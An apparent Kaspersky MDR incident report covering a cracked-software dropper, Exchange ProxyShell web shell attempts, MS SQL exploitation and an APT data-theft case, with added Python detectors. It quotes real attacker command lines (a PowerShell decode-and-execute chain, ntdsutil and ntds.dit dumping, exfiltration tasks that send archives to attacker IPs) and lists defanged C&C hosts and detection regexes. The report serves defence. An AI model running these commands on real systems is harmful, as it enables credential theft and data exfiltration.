Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9

Command:

"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes the Base64-encoded content stored inside the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys and then executes the decoded script.

The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.

The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).

The decoded payload contained a link to a C&C server:

Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe

The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com) that would have allowed further stages of the infection to be downloaded. In the meantime, a new AM engine signature was released, and the malicious samples are now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.
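The extraction step in the task’s command (read a byte range out of a large text file, Base64-decode it, run the result as a script block) is easy to replay during triage, and the same logic inverts into a scanner that finds such blobs in a long text file without knowing the offset in advance, reporting the line number the way the SOC did (line 4890 in this case). The Python below is an added example, not code from the report or from Kaspersky; the sample file, its filler lines and the harmless defanged string hidden on one line are constructed here, and the marker keywords used to judge whether a decoded blob is script are an assumption to tune.

```python
import base64
import re

# Constructed sample input (not from the report): a long text file with one Base64 line buried in filler.
HIDDEN_SCRIPT = "$u = 'hxxp://c2.example.invalid/stage2'; Write-Host $u"  # harmless, defanged marker text
HIDDEN_B64 = base64.b64encode(HIDDEN_SCRIPT.encode("utf-8")).decode("ascii")
SAMPLE_FILE = (
    "\n".join(f"lorem ipsum filler line {i} with some ordinary words" for i in range(1, 41))
    + "\n" + HIDDEN_B64 + "\n"
    + "\n".join(f"more filler line {i}" for i in range(41, 61)) + "\n"
).encode("utf-8")

# A run of Base64 alphabet long enough to be worth decoding; short tokens in ordinary text never qualify.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# Assumption to tune: strings that make a decoded blob look like script rather than data.
SCRIPT_MARKERS = re.compile(
    r"Invoke-|IEX|FromBase64String|ScriptBlock|Write-Host|\$\w+\s*=|https?://|hxxp://", re.I)


def extract_segment(data: bytes, offset: int, count: int) -> str:
    """Replays the task's own steps: take `count` bytes at `offset`, UTF-8 decode, Base64-decode, UTF-8 decode."""
    b64_text = data[offset:offset + count].decode("utf-8")
    return base64.b64decode(b64_text).decode("utf-8")


def looks_like_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def find_hidden_payloads(data: bytes) -> list:
    """Return (line_number, offset, length, decoded_text) for each Base64 run that decodes to script-like text."""
    findings = []
    for m in B64_RUN.finditer(data):
        run = m.group(0)
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # bad padding, stray characters or binary output: not what we are looking for
        if not looks_like_text(decoded) or not SCRIPT_MARKERS.search(decoded):
            continue
        line_no = data.count(b"\n", 0, m.start()) + 1  # 1-based line, as an analyst would report it
        findings.append((line_no, m.start(), len(run), decoded))
    return findings


if __name__ == "__main__":
    for line_no, offset, length, text in find_hidden_payloads(SAMPLE_FILE):
        print(f"line {line_no}, offset {offset}, {length} bytes: {text}")
        # the same segment, re-extracted the way the scheduled task's command did it
        assert extract_segment(SAMPLE_FILE, offset, length) == text
```

Run it against a suspect .sys or other text-in-disguise file by replacing SAMPLE_FILE with the file’s bytes; a hit gives the offset and length to feed into extract_segment, which reproduces exactly what the task’s GetString/FromBase64String chain would have executed, so the decoded script can be read rather than run.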

Case detection

The table below lists the attack techniques and how they were detected by Kaspersky MDR.

MITRE ATT&CK Technique / MDR telemetry event type used / Detection details / Description

T1547.001: Registry Run Keys / Startup Folder
  Telemetry event type: Autostart entry
  Detection details: Regex on autostart entry details
  Description: Malicious persistence
  Telemetry event type: AM detection
  Detection details: Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen

T1059.001: PowerShell
  Telemetry event type: Autostart entry
  Detection details: Regex on autostart entry details
  Description: Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”

T1216.001: System Script Proxy Execution
  Telemetry event type: Process start
  Detection details: Regex on command line
  Description: Malicious payload execution via C:\Windows\System32\SyncAppvPublishingServer.vbs

T1204.002: Malicious File
  Telemetry event type: Process start
  Detection details: Execution sequence: svchost.exe → explorer.exe → patch.exe, from directory C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\
  Description: The user executed a file downloaded by the Tixati BitTorrent client. As a result, the file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was created
  Telemetry event type: Local file operation
  Detection details: Creation of c:\users\<removed>\downloads\excelanalyzer 3.4.3\setup_excelanalyzer.exe, in this order: chrome.exe → tixati.exe
  Telemetry event type: Local file operation
  Detection details: Creation of 02f4f239-0922-49fe-a338-c7460cb37d95.sys, in this order: svchost.exe → patch.exe. Process command line: “C:\Users\<removed>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe”. The contents of 02f4f239-0922-49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary).

T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
  Telemetry event type: The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response
  Detection details: 02f4f239-0922-49fe-a338-c7460cb37d95.sys contained text; starting on line 4890, it contained a Base64-encoded payload.
  Description: Attacker hid payload

T1071.001: Web Protocols
  Telemetry event type: HTTP connection; Network connection
  Detection details: The SOC checked for successful connections to the discovered C&C server
  Description: A search for the attacker’s possible attempts to execute further stages of the attack

Server-side attacks on the perimeter

Case #1: A ProxyShell vulnerability in Microsoft Exchange

Case description

During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx

The ASPX file format, which this service should not be creating, together with the random file names, led our SOC analyst to believe that those files were web shells.

Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

Similar behavior was detected the next day, this time an attempt at creating one file:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx

KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique / MDR telemetry event type used / Detection details / Description

T1190: Exploit Public-Facing Application
  Telemetry event type: AM detection
  Detection details: Heuristic AM engine verdict: PDM:Exploit.Win32.Generic
  Description: Exploitation attempt

T1505.003: Web Shell
  Telemetry event type: Local file operation
  Detection details: Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
  Description: Web shell file creation

Case #2: MS SQL Server exploitation

Case description

The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21-<…>-<…>-<…>-181797 (Domain / username).

The SQL Server process attempted to create a suspicious file:

c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp

We observed that a suspicious assembly, db_0x2D09A3D6\65536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16, original file name evilclr.dll), was loaded into the SQL Server process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe).

The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.

The SQL Server host had previously been seen to be accessible from the Internet and to be under scanning from the TOR network.

After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:

The created SQL jobs attempted to connect to URLs like those shown below:

hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png

Some of the IP addresses were already on the deny list, while others were added in response to this incident.

We did not observe any other host within the monitoring scope attempting to connect to these IP addresses, which confirmed that the attack had been detected at an early stage.

The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.

Since the attack was detected in time and its further progress was blocked by the AM engine, the attacker was not able to proceed, and the customer corrected the network configuration errors to block access to the server from the Internet.
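Both perimeter cases come down to a server process doing something it has no business doing: an Exchange service writing ASPX files into web-served directories, and sqlservr.exe spawning powershell.exe. The Python below, an added example that is not the report’s or Kaspersky’s code, shows how those two observations translate into rules over file-creation and process-start telemetry; the event records, file names and command lines are constructed here, the process and path lists are assumptions to tune per estate, and the obfuscation regex is a simplified stand-in for the regex- and ML-based command line analysis the report mentions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed telemetry (not from the report): (event type, process or process chain, path or command line)
EVENTS = [
    ("file_create", "MSExchangeMailboxReplication.exe",
     r"\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\abcde.aspx"),
    ("file_create", "MSExchangeMailboxReplication.exe",
     r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\fghij.aspx"),
    ("file_create", "MSExchangeMailboxReplication.exe",
     r"c:\program files\microsoft\exchange server\v15\logging\mailboxreplicationservice\mrs.log"),
    ("process_start", ["services.exe", "sqlservr.exe", "powershell.exe"],
     "powershell.exe -nop -w hidden -enc " + "QQ" * 20),
    ("process_start", ["services.exe", "sqlservr.exe", "powershell.exe"],
     "powershell.exe -c Get-Date"),
    ("process_start", ["explorer.exe", "powershell.exe"], "powershell.exe"),
]

# Assumptions to tune per estate: which server processes are in scope and what counts as a shell
EXCHANGE_PROCESSES = {"msexchangemailboxreplication.exe", "w3wp.exe"}
DB_SERVERS = {"sqlservr.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
WEB_SHELL_EXTS = (".aspx", ".ashx", ".asmx", ".asp")
WEB_ROOTS = ("/inetpub/wwwroot/", "/frontend/httpproxy/")
# Simplified stand-in for command line analysis: encoded commands and in-memory decode/execute helpers
OBFUSCATED_PS = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"
    r"|frombase64string|invoke-expression|\biex\b", re.I)


@dataclass
class Alert:
    technique: str
    severity: str
    reason: str


def normalise_path(path: str) -> str:
    """Lower-case, forward slashes, and fold the loopback admin share form (//127.0.0.1/c$/...) into c:/..."""
    p = path.replace("\\", "/").lower()
    m = re.match(r"^//(?:127\.0\.0\.1|localhost)/([a-z])\$/(.*)$", p)
    return f"{m.group(1)}:/{m.group(2)}" if m else p


def check_file_create(process: str, path: str) -> Optional[Alert]:
    """T1505.003 candidate: an Exchange/IIS worker creating a server-side script under a web root."""
    p = normalise_path(path)
    if (process.lower() in EXCHANGE_PROCESSES and p.endswith(WEB_SHELL_EXTS)
            and any(root in p for root in WEB_ROOTS)):
        return Alert("T1505.003", "high", f"{process} wrote {path}")
    return None


def check_process_start(chain: list, cmdline: str) -> Optional[Alert]:
    """T1190 candidate: a database server process spawning a shell; obfuscated PowerShell raises severity."""
    names = [n.lower() for n in chain]
    if len(names) < 2 or names[-2] not in DB_SERVERS or names[-1] not in SHELLS:
        return None
    if OBFUSCATED_PS.search(cmdline):
        return Alert("T1190", "critical", " -> ".join(chain) + " with encoded or obfuscated PowerShell")
    return Alert("T1190", "high", " -> ".join(chain))


def evaluate(events) -> list:
    """Run every event through the rule that applies to its type and collect the alerts."""
    alerts = []
    for kind, subject, detail in events:
        alert = (check_file_create(subject, detail) if kind == "file_create"
                 else check_process_start(subject, detail))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in evaluate(EVENTS):
        print(f"[{a.severity}] {a.technique}: {a.reason}")
```

The file rule deliberately folds the \\127.0.0.1\c$ form into a local path first: the report’s first web shell path was written through the loopback admin share, and a rule that only matches C:\inetpub literally would miss it. The process rule keys on the immediate parent, so an Agent job that goes services.exe → sqlservr.exe → powershell.exe still fires even if the chain above sqlservr.exe differs.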

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique / MDR telemetry event type used / Detection details / Description

T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
  Telemetry event type: Network connection; AM detection
  Detection details: Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine.
  Description: The attacker scanned the SQL Server host

T1190: Exploit Public-Facing Application
  Telemetry event type: Process start
  Detection details: The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe
  Description: The attacker successfully exploited the SQL server
  Telemetry event type: Autostart entry
  Detection details: Execution of the object previously detected as an autostart entry with a bad reputation: sql:\SQLEXPRESS\db_0x2D09A3D6\65537_fscbd; original file name: evilclr.dll

T1059.001: PowerShell
  Telemetry event type: Autostart entry; Process start
  Detection details: Command line analysis showed the use of PowerShell.
  Description: Malicious persistence via an SQL Server job

T1027: Obfuscated Files or Information
  Telemetry event type: Autostart entry
  Detection details: Regex- and ML-based analysis of the SQL Server Agent job command line
  Description: The attacker attempted to evade detection
  Telemetry event type: Process start
  Detection details: Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line

T1505.001: SQL Stored Procedures
  Telemetry event type: Autostart entry
  Detection details: SQL Server Agent job analysis
  Description: Malicious persistence via an SQL Server job
  Telemetry event type: AM detection; AM detection on suspicious activity
  Detection details: Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a

T1071.001: Web Protocols
  Telemetry event type: HTTP connection; AM detection
  Detection details: The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server.
  Description: The attacker’s C&C server

What does exfiltration in a real-life APT look like?

Case #1: Collecting and stealing documents

Case description

Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:

“cmd.exe” /c “c:\perflogs\1.bat”, which started:

findstr "10.<…cut…>.
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\UpdateStore\windnphd.exe:

C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2
query user
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
C:\Windows\system32\cmd.exe /C ping <hostname1>
C:\Windows\system32\cmd.exe /C vssadmin list shadows
C:\Windows\system32\cmd.exe /C ipconfig /all
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$

Suspicious commands triggering actions in the Active Directory Database were executed:

C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit
C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit
C:\Windows\system32\cmd.exe /C dir c:\
C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit

After these commands were executed, the windnphd.exe process started an HTTP connection:

hxxp[:]//31.192.234[.]60:53/useintget

Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:

nd.exe c:\windows\system32\config\system c:\users\public\sys.txt
nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt
C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp
C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\
rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp\

Later, the SOC observed that a suspicious scheduled task had been created on the same host:

schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f

The task executed a suspicious file: c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320).

This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

The 0816-s.rar archive was created via remote execution of the following command through psexec:

rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"

After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

Similar suspicious behavior was detected on another host, <hostname>.

First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

Next, a task was created remotely via psexec.exe:

schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\winpdasd.exe" /f

During task execution, an external network communication was detected, and certain discovery commands were executed:

hxxp://31[.]192.234.60:53/useintget
ping 10.<…cut…> -n 1
query user
net use

This was followed by a connection to a network share on the host 10.<…cut…> as username3:

C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>

More reconnaissance command executions were detected:

C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn \Microsoft\Windows\Tcpip\dcrpytod

Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f

After that, C&C communications were detected:

hxxp://139.162.35[.]70:53/micsoftgp

This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.
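Two of the signals in this case are cheap to check in telemetry: HTTP spoken to 53/TCP (T1571), and schtasks /create commands that run as SYSTEM every few minutes from a user-writable directory, in one instance with the <file> <IP address> <port> <up|down> argument shape of the transfer tool analyzed later in the report. The Python below is an added example, not the report’s or Kaspersky’s code; the command lines are constructed (with a 203.0.113.0/24 documentation address in place of a real one), and the browser and path lists and the scoring weights are assumptions to tune.

```python
import re

# Assumptions to tune per estate
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
STANDARD_HTTP_PORTS = {80, 443, 8080, 8443}
# Directories a scheduled task's action should not normally live in
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\", "c:\\perflogs\\", "\\temp\\")


def check_http_connection(process: str, dst_port: int) -> list:
    """T1571 candidate: HTTP parsed on a port that normally carries another service.
    Returns the reasons to escalate; an empty list means nothing unusual."""
    if dst_port in STANDARD_HTTP_PORTS:
        return []
    reasons = [f"HTTP on non-standard port {dst_port}/tcp"]
    if dst_port == 53:
        reasons.append("53/tcp normally carries DNS, not HTTP")
    if process.lower() not in BROWSERS:
        reasons.append(f"non-browser process {process}")
    return reasons


SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)
RUN_AS_SYSTEM = re.compile(r'/ru\s+"?(?:nt authority\\)?system\b', re.I)
MINUTE_SCHEDULE = re.compile(r"/sc\s+minute\b", re.I)
TASK_ACTION = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)
# Argument shape of the transfer tool described in the report: <file> <IP address> <port> <up|down>
TRANSFER_ARGS = re.compile(r"\s\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\s+(?:up|down)\s*$", re.I)


def check_schtasks(cmdline: str):
    """Score a schtasks /create command line. Returns (score, reasons), or None if the line creates no task."""
    if not SCHTASKS_CREATE.search(cmdline):
        return None
    score, reasons = 0, []
    if RUN_AS_SYSTEM.search(cmdline):
        score += 2
        reasons.append("task runs as SYSTEM")
    if MINUTE_SCHEDULE.search(cmdline):
        score += 1
        reasons.append("minute-level repetition")
    m = TASK_ACTION.search(cmdline)
    action = (m.group(1) or m.group(2) or "") if m else ""
    if any(seg in action.lower() for seg in USER_WRITABLE):
        score += 2
        reasons.append(f"action lives in a user-writable directory: {action}")
    if TRANSFER_ARGS.search(action):
        score += 2
        reasons.append("action takes <file> <IP address> <port> <up|down> arguments")
    return score, reasons


# Constructed command lines (not from the report; 203.0.113.5 is a documentation address)
SAMPLE_COMMANDS = [
    r'schtasks /create /sc minute /mo 30 /ru system /tn \tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 203.0.113.5 53 down" /f',
    r'C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn \Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\svc.exe" /f',
    r'schtasks /create /sc daily /st 09:00 /tn Backup /tr "C:\Program Files\Vendor\backup.exe"',
    r'cmd.exe /c whoami',
]


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(check_schtasks(cmd), "<-", cmd)
    print(check_http_connection("windnphd.exe", 53))
```

The task scorer reads the action string out of the /tr argument rather than the whole line, so the path and argument checks are not fooled by what surrounds it (the second constructed sample is wrapped in cmd.exe /C, as in the report). The network check is deliberately stated in terms of reasons rather than a verdict: a single HTTP-on-53 event from a browser may be a misconfigured proxy, while the combination with a non-browser process is what made the case worth escalating.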

Case detection

The table below lists the attack techniques and how these were detected by Kaspersky MDR.

MITRE ATT&CK Technique / MDR telemetry event type used / Detection details / Description

T1569.002: Service Execution
  Telemetry event type: Process start
  Detection details: Command line analysis
  Description: The attacker performed reconnaissance and search in local logs. The attacker persisted in the victim’s system through service creation
  Telemetry event type: Windows event
  Detection details: Windows events on service installation and service start
  Telemetry event type: AM detection on suspicious activity
  Detection details: AM behavior analysis
  Description: The attacker executed windnphd.exe through psexec

T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
  Telemetry event type: Process start
  Detection details: Command line analysis
  Description: The attacker performed internal reconnaissance

T1021.002: SMB/Windows Admin Shares
  Telemetry event type: Share access
  Detection details: Inbound and outbound share access
  Description: The attacker tried to access \\10.<…cut…>.65\ipc$ and \\10.<…cut…>.52\c$

T1003.003: NTDS
  Telemetry event type: Process start
  Detection details: Command line analysis
  Description: The attacker accessed NTDS.dit with ntdsutil

T1071.001: Web Protocols
  Telemetry event type: HTTP connection; Network connection
  Detection details: The SOC checked if the data transfer was successful
  Description: The attacker communicated with the C&C server at hxxp[:]//31.192.234[.]60:53/useintget
  Telemetry event type: AM detection on suspicious activity
  Detection details: The connection was initiated by the suspicious process windnphd.exe

T1571: Non-Standard Port
  Telemetry event type: HTTP connection; Network connection
  Detection details: The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
  Description: Attacker used the C&C server hxxp[:]//31.192.234[.]60:53/useintget

T1587.001: Malware
  Telemetry event type: Local file operation; Process start; AM detection on suspicious activity
  Detection details: Use of various suspicious binaries prepared by the attacker specifically for this attack
  Description: The attacker used custom tools: s.exe, winpdasd.exe, windpchsvc.exe (see detailed report below)

T1497: Virtualization/Sandbox Evasion
  Telemetry event type: Malware analysis
  Detection details: Detected the HookSleep function (see below)
  Description: The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe

T1036.005: Match Legitimate Name or Location
  Telemetry event type: Local file operation; Malware analysis
  Detection details: Operations with the file c:\users\Default\ntusers.dat
  Description: The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat

T1140: Deobfuscate/Decode Files or Information
  Telemetry event type: Local file operation; Malware analysis
  Detection details: The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
  Description: The attacker executed arbitrary code

T1560.001: Archive via Utility
  Telemetry event type: Process start
  Detection details: Use of the RAR archiver for data collection
  Description: The attacker archived the stolen credentials and documents

T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
  Telemetry event type: Process start
  Detection details: Command line analysis
  Description: The attacker used a custom tool to exfiltrate data
  Telemetry event type: Network connection
  Detection details: Analysis of the process that initiated the connection

An analysis of the custom tools used by the attacker

windpchsvc.exe and winpdasd.exe

Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

Both loaders read their payload from a file whose name mimics a system file, a naming choice intended to deceive investigators and users:

Payload file for windpchsvc.exe

The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

A similar file name was used for the winpdasd.exe malware:

Payload file for winpdasd.exe

The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi):

windpchsvc.exe: decode, allocate memory, copy to mem, execute

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.

Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

The decompiled function can be seen below:

The “HookSleep” function found in both files, decompiled

When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:

The Sleep function redirected back to the malware code

s.exe

This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

s.exe <file> <IP address> <port> <up|down>

This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.

The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:

Decompiled network transfer tool

[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.

APT trends report Q3 2022

November 1, 2022 - 09:00

